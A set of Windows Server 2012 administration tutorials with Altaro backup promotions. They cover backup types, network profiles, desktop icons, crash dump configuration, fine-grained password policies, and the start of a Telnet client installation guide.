Your backups are stored on physical devices that can also fail. Testing them regularly is one way to avoid unpleasant surprises when you need them most. Have a backup verification day, at least once every few months, to test and verify the integrity of the drive. Essentially, you need to ensure it is possible to restore files and, in case of clone backups, boot from the drive.

Full Backup

A full backup creates an image file containing all disk sectors with data from within the operating system. Although the simplest form of backup, it is the least flexible, most time-consuming and most space-intensive method. Full backups are usually done about once a week as part of an overall backup plan, or after a major event such as an operating system upgrade or software install.

Differential Backup

Typically, only a very small percentage of the information in a partition or disk changes daily or weekly, therefore it is enough to back up only the data that has changed. You are doing a differential backup if you are backing up only the files that have changed since the last full backup. Differential backups are faster and more flexible than full backups because of the lower amount of data involved. However, the amount of data being backed up grows with each differential backup. That makes it unwieldy to create more than one differential backup a day.

Incremental Backup

You are doing an incremental backup if you are backing up only the data that changed since the last backup – whether full or incremental. Therefore, the shorter the time interval between incremental backups, the lower the amount of data to be backed up – you may backup hourly or even more frequently, depending on the importance of your work. Although incremental backups are the most flexible and granular of the three methods, restoring from incremental backups takes longer.
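To make the difference concrete, here is a purely illustrative PowerShell sketch comparing the total data copied over one week under each scheme; the 500 GB dataset size and 5 GB daily change rate are made-up numbers:

# Illustrative comparison of data copied over 7 days (all figures in GB)
$fullSize = 500; $dailyChange = 5
$fullEveryDay = $fullSize * 7                                                  # a full backup every day
$differential = $fullSize + ((1..6 | Measure-Object -Sum).Sum * $dailyChange)  # one full, then growing differentials
$incremental  = $fullSize + (6 * $dailyChange)                                 # one full, then small daily increments
"Full: $fullEveryDay GB   Differential: $differential GB   Incremental: $incremental GB"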

Backing up Virtual Machines

While most companies have moved to virtualized environments, the above backup methods are quickly being replaced by smarter and more efficient backup strategies. For example, VM backup software, free for two VMs, supports both Hyper-V and VMware and offers complete backup and restore functionality with the click of only a few buttons. Its advanced backup algorithms and smart design make backing up and restoring virtual machines or individual files/folders a very simple process.


Free Webinar: Troubleshooting & Fixing Microsoft Hyper-V Hosts & Clusters

Users working with Hyper-V virtualization would be interested to know that Altaro is hosting a free webinar on the 25th of February 2016 at 4pm CET / 10am EST. Microsoft Cloud and Datacenter Management MVPs Didier Van Hoye and Andy Syrewicze will be answering questions on how to fix a broken Hyper-V Host or Hyper-V Cluster and will also be sharing some tales from the trenches.

Don't miss out on this exclusive Hyper-V webinar and make sure you grab your free copy of Altaro's Hyper-V & VMware backup software!

 

Note: While this event's date has passed, you can access the recorded version and also download all the material provided. Simply follow the above link to access it.


How to Easily Change Network Card Profile / Network Location (Private or Public) on Windows Server 2012 R2

Network Location Awareness (NLA) is a feature offered on Windows Server 2012 R2 and all Windows workstation editions from Windows 8.1 and above, including Windows 10. When connecting to a network (LAN or wireless), the network is often misidentified as a Public network instead of a Private network, or vice versa. The same problem is also seen when adding an additional network card to a Windows 2012 server. This article explains how to use Windows PowerShell to quickly change any network card's identification between a Public or Private network and ensure the correct firewall rules are applied (if in use).

The screenshot below shows our Windows 2012 R2 server configured with two network cards. We’ve renamed the network cards to easily identify them, as such Ethernet0 was renamed to “Ethernet0 – WAN Adapter”, while Ethernet1 was renamed to “Ethernet1 – LAN Adapter”.


Windows Network Location Awareness (NLA) has incorrectly identified Ethernet0 as connected to a Private network, while Ethernet1 has been incorrectly identified as connected to a Public network, as shown below:

Windows Network Location Awareness (NLA) incorrectly identifies the Private & Public networks on our network interface cards

Figure 1. Windows Network Location Awareness (NLA) incorrectly identifies the Private & Public networks on our network interface cards

We should note that incorrect network profiles (Private or Public) also mean that the Windows Firewall is applying the incorrect rules to the network cards. For example, a Public network could have very strict rules configured, while the Private network might have less restrictive rules applied. As one can understand, this also creates a serious security hole and therefore the correct network profile (Private or Public) must be applied to each network interface card (network adapter).
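To see what each Windows Firewall profile currently enforces, the profiles can be inspected from PowerShell; a quick sketch:

# Show whether each Windows Firewall profile is enabled and its default actions
Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction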

Quickly Change Network Profiles (Public or Private) via PowerShell

To begin, launch the Windows PowerShell console by clicking on the PowerShell icon located on the taskbar:

Launching the Windows PowerShell console

Figure 2. Launching the Windows PowerShell console

Next, at the prompt enter the command Get-NetConnectionProfile to obtain a list of all network interfaces on the Windows Server, along with their identified network category (Private / Public):

Executing Get-NetconnectionProfile PowerShell cmd to obtain network profile & ID info

Figure 3. Executing Get-NetconnectionProfile PowerShell cmd to obtain network profile & ID info

Notice that the command output is identical to what we saw in the Network and Sharing Center screenshot at the beginning of the article.

Looking closely at the output, we’ll notice that each network card has an InterfaceAlias and an InterfaceIndex value. The InterfaceAlias is the name of the network card, in our case Ethernet0 – WAN Adapter and Ethernet1 – LAN Adapter respectively, while the InterfaceIndex represents the index number of the physical interface, that is, 12 for Ethernet0 and 24 for Ethernet1.

The final step is to use the Set-NetConnectionProfile command to configure each adapter with the desired network profile. First we set the LAN network card (Ethernet1) to the Private network profile and then the WAN network card (Ethernet0) to the Public network profile, as shown below:

Changing network profile for both network cards using the Set-NetConnectionProfile command

Figure 4. Changing network profile for both network cards using the Set-NetConnectionProfile command

Users can use either the –InterfaceAlias or -InterfaceIndex parameter to select the network interface to be changed. Here are the full commands for each parameter:

Set-NetConnectionProfile -InterfaceAlias "Ethernet1 - LAN Adapter" -NetworkCategory Private

or

Set-NetConnectionProfile -InterfaceIndex 24 -NetworkCategory Private
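Putting it together for both adapters and verifying the result, a minimal sketch (the interface names and index values are the ones from our example and will differ on other servers):

# Set the LAN adapter to Private and the WAN adapter to Public, then verify
Set-NetConnectionProfile -InterfaceAlias "Ethernet1 - LAN Adapter" -NetworkCategory Private
Set-NetConnectionProfile -InterfaceAlias "Ethernet0 - WAN Adapter" -NetworkCategory Public
Get-NetConnectionProfile | Select-Object InterfaceAlias, InterfaceIndex, NetworkCategory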


Moving back to the Network and Sharing Center, we can see that both network interfaces are now bound to the correct network profile:

Network interfaces are now bound to the correct network profile

Figure 5. Network interfaces are now bound to the correct network profile

This article explained how to change the network profiles configured on Windows Server 2012 network interface cards. We talked about the importance of having the correct network profile configured on each network interface card and how this affects the Windows Firewall rules. We also showed two different PowerShell commands (Set-NetConnectionProfile -InterfaceIndex & Set-NetConnectionProfile -InterfaceAlias) that can be used to make the network profile changes.


Free Webinar: Scripting & Automation in Hyper-V without System Center Virtual Machine Manager (SCVMM)

System Center Virtual Machine Manager (SCVMM) provides some great automation benefits for those organizations that can afford the hefty price tag. However, if SCVMM isn’t a cost effective solution for your business, what are you to do? While VMM certainly makes automation much easier, you can achieve a good level of automation with PowerShell and the applicable PowerShell modules for Hyper-V, clustering, storage, and more.

Click and Download Your Free Hyper-V or VMware backup solution Now!

Are you looking to get to grips with automation and scripting?

Join Thomas Maurer, Microsoft Datacenter and Cloud Management MVP, who will use this webinar to show you how to achieve automation in your Hyper-V environments, even if you don’t have SCVMM.

Remember, any task you have to do more than once should be automated. Bring some sanity to your virtual environment by adding some scripting and automation know-how to your toolbox.

Note: While the Webinar date has passed, you can still access the presentation and download all resources for free. Click below to access it:

Register for the webinar here:

hyper-v-altaro-free-webinar-scripting-automation-hyper-v-without-scvmm-1

About the presenter:

Thomas Maurer

Thomas Maurer works as a Cloud Architect at itnetx gmbh, a consulting and engineering company located in Bern, Switzerland, which has been awarded "Microsoft Datacenter Partner of the Year" by Microsoft for three consecutive years (2011, 2012, 2013). Thomas is focused on Microsoft technologies, especially Microsoft cloud solutions based on Microsoft System Center, Microsoft Virtualization and Microsoft Azure. This includes Microsoft Hyper-V, Windows Server, storage, networking and Azure Pack as well as Service Management Automation.

About the host:

Andrew Syrewicze

Andy is a Technical Evangelist for Altaro Software, providing technical marketing and pre-sales expertise. Prior to that, Andy spent 12+ years providing technology solutions across several industry verticals including education, Fortune 500 manufacturing, healthcare and professional services, working for MSPs and internal IT departments. During that time he became an expert in VMware, Linux and network security, but his main focus over the last 7 years has been on virtualization, cloud services and the Microsoft server stack, with an emphasis on Hyper-V.


How to Install Desktop Icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. Bring Back The Traditional Windows (7,8) Desktop Icons!

One of the first things IT administrators and IT managers notice after a fresh installation of Windows 2012 Server is that there are no desktop icons apart from the Recycle Bin. Desktop icons such as Computer, User’s Files, Network & Control Panel are not available by default. These icons are normally enabled through the Personalize menu, which appears when right-clicking an empty area of the desktop; however, this menu option is also not available by default.

windows-server-2012-display-desktop-icons-computer-network-user-files-1
Figure 1. Personalize Menu is not available by default on Windows 2012 Server

To bring back the Desktop icons, administrators must first install the Desktop Experience feature on Windows 2012 Server.


Note: Once the Desktop Experience Feature is installed, the server will require a restart.

To do so, click on the Server Manager icon on the taskbar:

windows-server-2012-display-desktop-icons-computer-network-user-files-2

Figure 2. Server Manager icon on Windows 2012 Server taskbar

 Now select Add Roles and Features:

windows-server-2012-display-desktop-icons-computer-network-user-files-3

Figure 3. Selecting Add roles and features in Windows 2012 Server

 

Now, click Next on the Before you Begin page and at the Installation Type page select Role-based or feature-based installation. Next, select your server from the server pool and click Next:

windows-server-2012-display-desktop-icons-computer-network-user-files-4

Figure 4. Selecting our destination server

At the next window, click on Features located on the left side; do not select anything from the Server Roles page, which is displayed by default. Under Features, scroll down to User Interfaces and Infrastructure and click to expand it. Now tick Desktop Experience:

windows-server-2012-display-desktop-icons-computer-network-user-files-5

Figure 5. Selecting Desktop Experience under User Interfaces and Infrastructure

When Desktop Experience is selected, a pop up window will ask us to confirm the installation of a few additional services or features required. At this point, simply click on Add Features. Now click on Next and then the Install button.

This will install all necessary server components and add-ons:

windows-server-2012-display-desktop-icons-computer-network-user-files-6

Figure 6. Installation of server components and add-ons - Windows 2012 Server

Once complete, the server will require a restart. After the server restart, we can right-click in an empty area on our desktop and we’ll see the Personalize menu. Select it and then click on Change desktop icons from the next window:

windows-server-2012-display-desktop-icons-computer-network-user-files-7

Figure 7. Selecting Change desktop icons - Windows 2012 Server

Now simply select the desktop icons required to be displayed and click on OK:

windows-server-2012-display-desktop-icons-computer-network-user-files-8

Figure 8. Select Desktop icons to be displayed on Windows 2012 Server Desktop
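Administrators who prefer the command line can install the Desktop Experience feature from PowerShell instead of Server Manager; a minimal sketch (a restart is still required):

# Install the Desktop Experience feature and restart automatically when done
Install-WindowsFeature Desktop-Experience -Restart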


This article showed how to enable desktop icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. We explained this using a step-by-step process and included all necessary screenshots to ensure a quick and trouble-free installation. For more Windows 2012 Server tutorials, visit our Windows Server section.


Easy, Fast & Reliable Hyper-V & VMware Backup with Altaro's Free Backup Solution

As more companies around the world adopt virtualization technology to increase efficiency and productivity, Microsoft’s Hyper-V virtualization platform is continuously gaining ground in the global virtualization market, as is the need for IT departments to provide rock-solid backup solutions for their Hyper-V virtualized environments.

History has shown that backup procedures have always been a major pitfall for most IT departments and companies. With virtualized environments, the need for a backup solution is more important than ever, especially when we consider that physical servers now host multiple virtual servers.

While creating a backup plan and verifying backups can become an extremely complicated and time-consuming process, Altaro has managed to deliver a backup solution that takes care of the backup process for the virtualized environment and ensures the data integrity of servers. Furthermore, Altaro’s backup solution is complemented by a simple recovery procedure, guaranteeing quick and easy recovery from the failure of any virtual machine or hypervisor host.

What’s even better is that Altaro’s Hyper-V & VMware backup solution is completely free for a limited number of virtual servers!

Download your Free Hyper-V & VMware Altaro Backup Solution Now - Limited Offer!

Altaro Hyper-V & VMware backup is a feature-rich application that allows users to backup and restore VMs with literally just a few clicks. The user interface of Altaro VM Backup is easy to use, with all the necessary features to make the Hyper-V or VMware backup & restore process an easy and simple task.

Main Features Of Altaro VM Backup

  • User-friendly easy to use admin console.
  • Supports Microsoft Windows Server 2012 R2, 2012, 2008 R2, Hyper-V & ESX/ESXi server core.
  • Backup virtual machines per schedule.
  • Restore single or multiple virtual machines to different Hyper-V/VMware host or same host.
  • Rename virtual machines while restoring the virtual machine to same host or different host.
  • Backup Linux VMs without shutting down the machine.
  • Secured backups with AES encryption.
  • Reduced backup file size with powerful compression.
  • Central Altaro Hyper-V backup management for multiple Hyper-V hosts.
  • File-level restore allows you to mount backed-up VHDs and restore individual files without restoring the whole virtual machine.
  • Business continuity with offsite backup and WAN acceleration.
  • Backup of Exchange Server VMs (supports Exchange 2007, 2010, 2013) with Exchange item-level restore options.
  • Supports backup of Hyper-V Cluster Shared Volumes for larger deployments.
  • Support for Microsoft SQL database VM backup.
  • Free for up to two Virtual Machines.
  • Extremely low pricing per host (not per socket) provides unbeatable value.

It is evident that Altaro Hyper-V backup provides a plethora of features that makes it a viable solution for companies of any size.

Altaro Hyper-V  Backup Installation Requirements

Installing the Altaro Hyper-V backup application is no different than installing any other Windows application; it is very easy.
It is important to note that Altaro Hyper-V Backup must be installed on the Hyper-V host machine, not on a guest machine. Altaro Hyper-V Backup supports the following host server editions:

  • Windows 2008 R2 (all editions)
  • Windows Hyper-V Server 2008 R2 (core installation)
  • Windows Server 2012 (all editions)
  • Windows Hyper-V Server 2012 (core installation)
  • Windows Server 2012 R2 (all editions)
  • Windows Hyper-V Server 2012 R2 (core installation)

Minimum system requirements of Altaro Hyper-V Backup are:

  • 350 MB Memory
  • 1 GB free Hard Disk space for Altaro Hyper-V Backup Program and Settings files
  • .NET Framework 3.5 on Windows Server 2008 R2
  • .NET Framework 4.0 on Windows Server 2012

Following is a list of supported backup destinations. This is where you would save the backup of your Hyper-V virtual machines:

  • USB External Drives
  • eSata External Drives
  • USB Flash Drives
  • Fileserver Network Shares using UNC Paths
  • NAS devices (Network Attached Storage) using UNC Paths
  • RDX Cartridges
  • PC Internal Hard Drives (recommended only for evaluation purposes)

Grab a Free Copy of VM Altaro Backup Solution Now!

Installing Altaro Hyper-V Backup Software

The first step is to grab a fresh copy of Altaro’s Hyper-V backup application by downloading it from Altaro’s website.
Run the installation file and you will see the application’s welcome screen. Click Next to continue through the following windows until the installation is complete.

windows-hyper-v-free-backup-1Figure 1. Installation Welcome Screen

After a few moments, the installation completes. At this point, check the Launch Management Console option and click Finish:
 

windows-hyper-v-free-backup-2 Figure 2. Altaro Hyper-V Installation Complete

At this point, Altaro Hyper-V Backup has been successfully installed on our Hyper-V server and is ready to run by ticking the Launch Management Console option and clicking on the Finish button.

Alternatively, Administrators can also install the Altaro Hyper-V Backup application on a workstation or different server, connect remotely to the Hyper-V server and perform all necessary configuration and backup tasks from there.

We found the ‘remote management’ capability extremely handy and proceeded to try it out on our Windows 7 workstation.
It’s worth noting that it makes no difference whether you select to run Altaro’s Hyper-V Backup directly on the Hyper-V host or remotely as we did.

After installing the application on our Windows 7 workstation, we ran it and entered the necessary details to connect with the Hyper-V host:

windows-hyper-v-free-backup-3Figure 3. Connecting to the Hyper-V Agent Remotely

Users running the application directly on the Hyper-V host would select the ‘This Machine’ option from above.

Once connected to the Hyper-V agent, the Altaro Hyper-V Backup main screen appears:


windows-hyper-v-free-backup-4 Figure 4. Altaro Hyper-V Backup - Main Screen (click to enlarge)

Altaro’s Hyper-V Backup solution offers an extensive number of options. When running the application for the first time, it provides a quick 3-step guide to help you quickly set up a few mandatory options and perform your first Hyper-V backup in just a couple of minutes!

In our upcoming articles, we’ll be taking a closer look at how Altaro’s Hyper-V Backup application manages to make life easy for virtualization administrators, with its easy backup and restore procedures.

Summary

This article introduced Altaro’s Hyper-V Backup application – a complete backup and restore solution that manages to take away the complexity of managing backup and restore procedures for any size Hyper-V virtualization environment. Altaro’s Hyper-V Backup solution is completely FREE for a limited number of Virtual Machines!


Troubleshooting Windows Server 2012 R2 Crashes. Analysis of Dump Files & Options. Forcing System Server Crash (Physical/Virtual)

There are umpteen reasons why your Windows Server 2012 R2 decides to present you with a Blue Screen of Death (BSOD) or the stop screen. As virtual machines become more prominent in enterprise environments, the same problems that plagued physical servers earlier are now increasingly being observed for crashes of virtual machines as well.

Microsoft designs and configures Windows systems to capture information about the state of the operating system if a total system failure occurs (as opposed to the failure of an individual application). You can see and analyze the captured information in the dump files, the settings of which you can configure using the System tool in the Control Panel. By default, the BSOD provides minimal information about the possible cause of the system crash, and this may suffice in most circumstances to help identify the cause of the crash.

However, some crashes may require a deeper level of information than what the stop screen provides – for example, when your server simply hangs and becomes unresponsive. In that case, you may still be able to see the desktop, but moving the mouse or pressing keys on the keyboard produces no response. To resolve the issue, you need a memory dump. This is basically a binary file that contains a portion of the server's memory just before it crashed. Windows Server 2012 R2 provides five options for configuring memory dumps.


Different Types Of Memory Dump Files

1. Automatic Memory Dump

The Automatic memory dump is the default setting that Windows Server 2012 R2 starts off with. It is not really a new memory dump type, but rather a Kernel memory dump that allows the SMSS process to reduce the page file to a size smaller than the amount of installed RAM. The system-managed page file therefore takes up less space on disk.

2. Complete Memory Dump

A complete memory dump is a record of the complete contents of the physical memory or RAM in the computer at the time of crash. Therefore, this needs a page file that is at least as large as the size of the RAM present plus 1MB. The complete memory dump will usually contain data from the processes that were running when the dump was collected. A subsequent crash will overwrite the previous contents of the dump.

3. Kernel Memory Dump

The kernel memory dump records only the read/write pages associated with the kernel-mode in physical memory at the time of crash. The non-paged memory saved in the kernel memory dump contains a list of running processes, state of the current thread and the list of loaded drivers. The amount of kernel-mode memory allocated by Windows and the drivers present on the system define the size of the kernel memory dump.

4. Small Memory Dump

A small memory dump or a MiniDump is a record of the stop code, parameters, list of loaded device drivers, information about the current process and thread, and includes the kernel stack for the thread that caused the crash.

5. No Memory Dump

Sometimes you may not want a memory dump when the server crashes.

Configuring Dump File Settings

Windows Server 2012 R2 allows you to configure an Automatic memory dump. To start the configuration, you have to log in as a local administrator and click on Control Panel in the Start menu:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001 

Figure 1. Invoking the Windows Server Control Panel


From the Control Panel, click on System and Security icon. Next, click on System:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-002 

Figure 2. System and Security

In the System Properties that opens up, click on the Advanced tab as shown below:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-003 

Figure 3. System Properties – Advanced Tab

 In the Advanced System Properties, look for and click on Settings under Startup and Recovery section:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-004 

Figure 4. Startup and Recovery dialog

 

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-005

Figure 5. The five types of debugging information (memory dumps) available

Here, you have the choice to let your server automatically restart on system failure. Under Write Debugging information, you can select one of the five types of memory dumps to be saved in the event of a server crash.
 
You can also define the name of the dump file the server should create and specify its location. The default location is in the System Root and the default name of the file is MEMORY.DMP. If you do not want the previous file to be overwritten by the new dump file, remove the tick mark from Overwrite any existing file (visible in figure 4).

When done, you will need to restart the server for the changes to take place.
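The currently configured crash dump settings can also be read straight from the registry with PowerShell; a quick sketch:

# Display the current crash dump configuration
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl" |
    Select-Object CrashDumpEnabled, DumpFile, Overwrite, AutoReboot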

Manually Generating A Dump File

Although the server will create the dump files when it crashes, you do not have to wait indefinitely for a crash to occur. As described in Microsoft’s support pages Generating a System Dump via Keyboard and Forcing a System Crash via Keyboard, you can induce the server to crash with a specific combination of keys. Of the several methods described by Microsoft, we will discuss the method for USB keyboards.

Forcing a System Crash From the Keyboard

Begin with a command prompt with administrative privileges. To open it, go to the Start menu and click on Command Prompt (Admin):

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-006

Figure 6. Invoking the Command Prompt with Elevated Privileges

In the command prompt window that opens, type in “regedit” and hit Enter:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-007 

Figure 7. Opening and Editing the Windows Registry

This opens the Registry Editor screen. Now expand all the way to the following section:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl

Right-click on CrashControl and create a new DWORD with the name CrashDumpEnabled which will appear in the right hand pane. Next, modify its value by right-clicking on CrashDumpEnabled in the right hand pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-008

Figure 8. Editing the Registry. Modifying the new registry DWORD CrashDumpEnabled

In the Edit DWORD Value dialog that opens enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-009

Figure 9. Editing the Value Data of CrashDumpEnabled

Next step is to go to the following registry location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid\Parameters

Right-click on Parameters and create a new DWORD with the name CrashOnCtrlScroll, which will appear in the right pane:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-010

Figure 10. Editing the Registry. Creating the new Registry DWORD CrashOnCtrlScroll

Now, modify the CrashOnCtrlScroll value by right-clicking on CrashOnCtrlScroll in the right pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-011 

Figure 11. Modifying the Registry DWORD entry CrashOnCtrlScroll

 In the Edit DWORD Value dialog that opens, enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-012

Figure 12. Editing the Value data of CrashOnCtrlScroll

Restart the server for the new values to take effect.
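For admins who prefer not to click through the Registry Editor, the same two values can be created from an elevated PowerShell prompt; a minimal sketch for USB keyboards (the kbdhid path is the one used in this walkthrough):

# Enable crash dumps and the CTRL + SCROLL LOCK trigger for USB keyboards
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl" -Name CrashDumpEnabled -PropertyType DWord -Value 1 -Force
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\kbdhid\Parameters" -Name CrashOnCtrlScroll -PropertyType DWord -Value 1 -Force
Restart-Computer   # the new values take effect after a restart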

Next, to crash the server, press the combination of keys:

CTRL + SCROLL LOCK + SCROLL LOCK

Note: Press SCROLL LOCK key twice while holding down the CTRL key.

The server will crash and restart and should have created a new dump file.

Note: However, as described in the Microsoft support pages referred to above, this method does not always work; for other methods, you can refer to additional Microsoft support pages here.

This article explained why Windows Server dump files are considered important and how we can configure Windows Server 2012 R2 to save crash dump files. We saw the different memory Dumps (Automatic Memory Dump, Complete Memory Dump, Kernel Memory Dump, Small Memory Dump, No Memory Dump) and how to configure the dump’s settings. More articles on Windows Server 2012 can be found in our Windows Server 2012 Section.


Installation and Configuration of Fine-Grained Password Policy for Windows Server 2012

Microsoft introduced Fine-Grained Password Policy for the first time in Windows Server 2008, and the policy has been part of every Windows Server release since then. Fine-Grained Password Policy overcomes the limitation of having only one password policy for a single domain; for example, it lets us apply different password and account lockout policies to different users in the same domain.
 
This article discusses the Fine-Grained Password Policy as applicable to Windows Server 2012, and the different ways of configuring this policy. Windows Server 2012 allows two methods of configuring the Fine-Grained Password Policy:

1. Using the Windows PowerShell

2. Using the Active Directory Administrative Center or ADAC

In earlier Windows Server editions, it was possible to configure Fine-Grained Password Policy only through the command line interface (CLI). However, with Windows Server 2012, a graphical user interface has been added, allowing the configuration of Fine-Grained Password Policy via the Active Directory Administrative Center. We will discuss both methods.

Before you begin to implement Fine-Grained Password Policy, you must make sure the domain functional level is Windows Server 2008 or higher. Refer to the relevant Windows 2012 articles on our website, Firewall.cx.


Configuring Fine-Grained Password Policy From Windows PowerShell

Use your administrative credentials to log in to your Windows Server 2012 domain controller. Invoke the PowerShell console by right-clicking on the third icon from the left in the taskbar on the Windows Server desktop and then clicking on Run as Administrator.

windows-2012-install-setup-fine-grained-password-policy-01

Figure 1. Executing Windows PowerShell as Administrator

Clicking on Yes to the UAC confirmation will open up an Administrator: Windows PowerShell console.

Within the PowerShell console, type the following command in order to begin the creation of a new fine grained password policy and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy

windows-2012-install-setup-fine-grained-password-policy-02

Figure 2. Creating a new Fine Grained Password Policy via PowerShell

Type a name for the new policy at the Name: prompt and press Enter. In our example, we named our policy FGPP:

windows-2012-install-setup-fine-grained-password-policy-03

Figure 3. Naming our Fine Grained Password Policy

Type a precedence index number at the Precedence: prompt and press Enter. Note that policies with a lower precedence number take priority over those with higher precedence numbers. We've set our new policy with a precedence of 15:

Figure 4. Setting the Precedence index number of our Fine Grained Password Policy

Now the policy is configured, but with default values only. To set specific parameters, you can instead create the policy and define all of its settings in a single command (an existing policy can later be adjusted with Set-ADFineGrainedPasswordPolicy). Type the following at the Windows PowerShell command prompt and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy -Name FGPP -DisplayName FGPP -Precedence 15 -ComplexityEnabled $true -ReversibleEncryptionEnabled $false -PasswordHistoryCount 20 -MinPasswordLength 10 -MinPasswordAge 3.00:30:00 -MaxPasswordAge 30.00:30:00 -LockoutThreshold 4 -LockoutObservationWindow 0.00:30:00 -LockoutDuration 0.00:45:00

In the above command, replace FGPP with the name of your own password policy.

The parameters used above map to the standard password and account lockout settings and are largely self-explanatory:

Attributes for Password Settings above include:

  • Enforce password history
  • Maximum password age
  • Minimum password age
  • Minimum password length
  • Passwords must meet complexity requirements
  • Store passwords using reversible encryption

Attributes involving account lockout settings include:

  • Account lockout duration
  • Account lockout threshold
  • Reset account lockout after


To apply the policy to a user/group or users/groups, use the following command at the PowerShell command prompt:

C:\Windows\system32> Add-ADFineGrainedPasswordPolicySubject -Identity FGPP -Subjects "Chris_Partsenidis"

For confirming whether the policy has indeed been applied to the groups/users correctly, type the following command at the PowerShell command prompt and press Enter:

C:\Windows\system32> Get-ADFineGrainedPasswordPolicy -Filter { name -like "FGPP" }

Remember, it is necessary to replace FGPP in the above with the name of your password policy. Also replace Chris_Partsenidis with the name of the group or user to whom you want to apply the policy.

The screenshot below shows the execution of the commands and output:

 windows-2012-install-setup-fine-grained-password-policy-05

Figure 5. Applying and verifying a Fine Grained Password Policy to a User or Group

Check the AppliesTo section from the output to verify if the policy is applied to the intended user or group.
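
If you also want to confirm which password policy a given user actually ends up with once precedence is evaluated, the ActiveDirectory module includes a resultant-policy cmdlet. A quick check using our example account:

PS C:\Windows\system32> Get-ADUserResultantPasswordPolicy -Identity Chris_Partsenidis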

Configuring Fine-Grained Password Policy Using The Active Directory Administrative Center (ADAC)

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the Server Manager Dashboard by left-clicking on the second icon in the taskbar on the Windows Server desktop:

windows-2012-install-setup-fine-grained-password-policy-06

Figure 6. Opening Server Manager Dashboard

In the Server Manager Dashboard, go to the top right hand corner, click on Tools and then click on Active Directory Administrative Center:

windows-2012-install-setup-fine-grained-password-policy-07

Figure 7. Launching Active Directory Administrative Center

Once the Active Directory Administrative Center screen is open, select the domain node in the left panel to expand it.

In our example, the domain node is firewall (local). Locate the System container, expand it and click on Password Settings Container:

windows-2012-install-setup-fine-grained-password-policy-08

Figure 8. Locating the Password Settings Container

On the right panel, under Tasks and Password Settings Container, click on New:

windows-2012-install-setup-fine-grained-password-policy-09

Figure 9. Accessing Password Settings Container

Now click on Password Settings, which will open up the Create Password Settings screen. Enter a name for the Fine-Grained Password Policy and a number for its precedence.

For our example, we are using the name FGPP or Firewall Group Password Policy with a precedence index of 15. Also, configure the remainder of the policy settings as required:

windows-2012-install-setup-fine-grained-password-policy-010 
Figure 10. Configuring settings for our FGPP Policy

Once satisfied with the settings, click on Add at the bottom right hand corner. This will open up the Select Users or Groups dialog.

Click on Object Types to select either Users or Groups or both. Click on Locations to select the domain, which in our case is firewall.local.

Under the object names to select, type the name of the group or user on whom you want to apply the password policy. In our example, this is Chris_Partsenidis as shown below:

windows-2012-install-setup-fine-grained-password-policy-011

Figure 11. Selecting the Active Directory object to which the Fine Grained Password Policy will be applied

Click on OK, and you will return to the Create Password Settings screen, which will now have the new name FGPP on top and the name of the user (to whom the policy will apply) at the bottom:

windows-2012-install-setup-fine-grained-password-policy-012

Figure 12. Our Fine Grained Password Policy

Click on OK to complete the process and go back to the Active Directory Administrative Center, which will now show the new Password Settings Container with the name FGPP and the precedence index in the center panel:

windows-2012-install-setup-fine-grained-password-policy-013

Figure 13. Our Fine Grained Password Policy appearing in the Password Settings Container

To modify any parameter, double click on the Password Settings Container in the central panel. Finally, when you are done, close the Active Directory Administrative Center window.

This article covered the installation and configuration of Fine-Grained Password Policies for Windows Server 2012. We explained how Fine-Grained Password Policies can be configured via PowerShell and the Active Directory Administrative Center. Our step-by-step guide shows all the necessary details to ensure a successful installation and configuration. More high-quality articles can be found in our Windows 2012 Section.


How to Install/Enable Telnet Client for Windows Server 2012 via GUI, Command Prompt and PowerShell

IT professionals frequently need connectivity and management tools, and the Telnet Client is one of the most basic tools for such activities. Using this tool, you can connect to a remote Telnet server and run applications on it. It is also a very useful tool for testing connectivity to remote servers, such as those running SMTP services, web services and so on. In this article we will discuss how to install or enable the Telnet client for Windows Server 2012, using the GUI, the command prompt or PowerShell.

Microsoft operating systems since Windows NT have included the Telnet client as a feature. However, later operating systems, beginning with Windows Server 2008 and Windows Vista, no longer enable it by default. Although you can always use a third-party tool for remote connections and connectivity troubleshooting, you can enable the Telnet client on your Windows Server 2012 any time it is needed.


Primarily, there are three ways you can install or enable the Telnet client for Windows Server 2012. You can install the Telnet client from the Graphical User Interface, Windows command prompt or from PowerShell. We will discuss all the methods in this article.

Installing Telnet Client From The GUI

Invoke the Server Manager by clicking on the second icon on the bottom taskbar on the desktop of the Windows Server 2012 R2:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-01

Figure 1. Launching Windows Server Dashboard

On the Dashboard, click on Add Roles and Features, which opens the Add roles and features wizard:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-02 
Figure 2. Selecting Add roles and features on Windows Server 2012

Click on Installation Type and select Role Based or Feature Based Installation. Click on Next to proceed:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-03

Figure 3. Selecting Installation Type – Role-based or feature-based installation

On the next screen, you can Select a server from the server pool. We select the server FW-DC1.firewall.local:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-04 
Figure 4. Selecting our server, DC1.firewall.local

